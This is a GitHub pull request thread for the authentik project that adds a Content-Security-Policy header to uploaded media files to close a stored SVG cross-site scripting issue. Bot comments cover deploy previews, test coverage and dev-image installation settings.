internal: add CSP header to files in `/media`

[gergosimonyi]

This fixes a security issue of stored cross-site scripting via embedding JavaScript in SVG files by a malicious user with can_save_media capability.

This can be exploited if:

• the uploaded file is served from the same origin as authentik, and
• the user opens the uploaded file directly in their browser

[netlify[bot]]

✅ Deploy Preview for authentik-docs canceled.

Name	Link
🔨 Latest commit	1d275a8eef80995c094a3607f9dc01cb46b6ea8e
🔍 Latest deploy log	https://app.netlify.com/sites/authentik-docs/deploys/673df7b9a362a60008dc9fc3

[netlify[bot]]

✅ Deploy Preview for authentik-storybook canceled.

Name	Link
🔨 Latest commit	1d275a8eef80995c094a3607f9dc01cb46b6ea8e
🔍 Latest deploy log	https://app.netlify.com/sites/authentik-storybook/deploys/673df7b999f98b00080c84ba

[codecov[bot]]

Codecov Report

All modified and coverable lines are covered by tests :white_check_mark:

Project coverage is 44.89%. Comparing base (dc9de43) to head (1d275a8).

:white_check_mark: All tests successful. No failed tests found.

:exclamation: There is a different number of reports uploaded between BASE (dc9de43) and HEAD (1d275a8). Click for more details.

HEAD has 8 uploads less than BASE

| Flag | BASE (dc9de43) | HEAD (1d275a8) | |------|------|------| |e2e|8|2| |unit|2|0|

Additional details and impacted files

```diff @@ Coverage Diff @@ ## main #12092 +/- ## =========================================== - Coverage 92.60% 44.89% -47.71% =========================================== Files 761 759 -2 Lines 37929 37666 -263 =========================================== - Hits 35124 16911 -18213 - Misses 2805 20755 +17950 ``` | [Flag](https://app.codecov.io/gh/goauthentik/authentik/pull/12092/flags?src=pr&el=flags&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=goauthentik) | Coverage Δ | | |---|---|---| | [e2e](https://app.codecov.io/gh/goauthentik/authentik/pull/12092/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=goauthentik) | `43.59% <ø> (-5.50%)` | :arrow_down: | | [integration](https://app.codecov.io/gh/goauthentik/authentik/pull/12092/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=goauthentik) | `24.85% <ø> (ø)` | | | [unit](https://app.codecov.io/gh/goauthentik/authentik/pull/12092/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=goauthentik) | `?` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=goauthentik#carryforward-flags-in-the-pull-request-comment) to find out more.

:umbrella: View full report in Codecov by Sentry.
:loudspeaker: Have feedback on the report? Share it here.

---

🚨 Try these New Features:

• JS Bundle Analysis - Avoid shipping oversized bundles

[github-actions[bot]]

authentik PR Installation instructions

Instructions for docker-compose

Add the following block to your `.env` file: ```shell AUTHENTIK_IMAGE=ghcr.io/goauthentik/dev-server AUTHENTIK_TAG=gh-1d275a8eef80995c094a3607f9dc01cb46b6ea8e AUTHENTIK_OUTPOSTS__CONTAINER_IMAGE_BASE=ghcr.io/goauthentik/dev-%(type)s:gh-%(build_hash)s ``` For arm64, use these values: ```shell AUTHENTIK_IMAGE=ghcr.io/goauthentik/dev-server AUTHENTIK_TAG=gh-1d275a8eef80995c094a3607f9dc01cb46b6ea8e-arm64 AUTHENTIK_OUTPOSTS__CONTAINER_IMAGE_BASE=ghcr.io/goauthentik/dev-%(type)s:gh-%(build_hash)s ``` Afterwards, run the upgrade commands from the latest release notes.

Instructions for Kubernetes

Add the following block to your `values.yml` file: ```yaml authentik: outposts: container_image_base: ghcr.io/goauthentik/dev-%(type)s:gh-%(build_hash)s global: image: repository: ghcr.io/goauthentik/dev-server tag: gh-1d275a8eef80995c094a3607f9dc01cb46b6ea8e ``` For arm64, use these values: ```yaml authentik: outposts: container_image_base: ghcr.io/goauthentik/dev-%(type)s:gh-%(build_hash)s global: image: repository: ghcr.io/goauthentik/dev-server tag: gh-1d275a8eef80995c094a3607f9dc01cb46b6ea8e-arm64 ``` Afterwards, run the upgrade commands from the latest release notes.

[BeryJu]

/cherry-pick version-2024.10